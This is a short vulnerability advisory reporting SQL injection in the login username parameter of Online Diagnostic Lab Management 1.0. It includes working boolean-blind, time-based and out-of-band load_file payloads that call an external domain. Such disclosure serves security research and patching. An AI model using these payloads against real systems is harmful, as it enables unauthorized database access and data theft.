Headline
Online Diagnostic Lab Management 1.0 SQL Injection
Online Lab Diagnostic Management version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 08/01/2023## Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g## Vendor: https://www.youtube.com/@MayuriK## Software: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can steal all information from the databasevery easily.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: username=-2553' OR 3590=3590-- aPlO&password=y4S!v5f!S4&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=hMRUaqVg'+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+''AND (SELECT 2815 FROM (SELECT(SLEEP(15)))TjiG)--NgnE&password=y4S!v5f!S4&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Online-Diagnostic-Lab-Management-1.10)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/07/online-diagnostic-lab-management-v10.html)## Time spend:00:35:00